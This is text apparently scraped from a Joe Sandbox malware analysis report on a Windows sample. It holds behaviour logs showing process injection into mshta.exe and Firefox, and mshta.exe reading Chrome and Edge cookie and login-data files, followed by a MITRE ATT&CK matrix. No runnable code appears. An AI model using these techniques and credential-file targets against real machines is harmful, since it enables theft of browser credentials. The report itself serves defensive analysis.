Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQuerySystemInformation: Direct from: 0x77172DFC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtReadFile: Direct from: 0x77172ADC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQueryInformationProcess: Direct from: 0x77172C26	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtResumeThread: Direct from: 0x77172FBC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtWriteVirtualMemory: Direct from: 0x7717490C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtCreateUserProcess: Direct from: 0x7717371C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtOpenKeyEx: Direct from: 0x77172B9C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtNotifyChangeKey: Direct from: 0x77173C2C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtSetInformationProcess: Direct from: 0x77172C5C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtProtectVirtualMemory: Direct from: 0x77172F9C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtResumeThread: Direct from: 0x771736AC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtMapViewOfSection: Direct from: 0x77172D1C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtWriteVirtualMemory: Direct from: 0x77172E3C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtUnmapViewOfSection: Direct from: 0x77172D3C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtCreateMutant: Direct from: 0x771735CC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtDeviceIoControlFile: Direct from: 0x77172AEC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtAllocateVirtualMemory: Direct from: 0x77172BEC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtTerminateThread: Direct from: 0x77172FCC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQueryInformationToken: Direct from: 0x77172CAC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtCreateFile: Direct from: 0x77172FEC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtOpenFile: Direct from: 0x77172DCC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtClose: Direct from: 0x77172B6C
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtSetInformationThread: Direct from: 0x771663F9	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtAllocateVirtualMemory: Direct from: 0x77173C9C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQueryAttributesFile: Direct from: 0x77172E6C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtSetInformationThread: Direct from: 0x77172B4C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtReadVirtualMemory: Direct from: 0x77172E8C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtCreateKey: Direct from: 0x77172C6C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQueryVolumeInformationFile: Direct from: 0x77172F2C	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtAllocateVirtualMemory: Direct from: 0x771748EC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtQuerySystemInformation: Direct from: 0x771748CC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtOpenSection: Direct from: 0x77172E0C	Jump to behavior

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: NULL target: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: NULL target: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: NULL target: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3692264556.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000000.1429441257.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3692497686.00000000013B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3692264556.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000000.1429441257.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3692497686.00000000013B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3692264556.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000000.1429441257.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3692497686.00000000013B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerW
Source: lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3692264556.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000000.1429441257.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3692497686.00000000013B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Users\user\Desktop\MmF9tcIj1J.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MmF9tcIj1J.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
MmF9tcIj1J.exe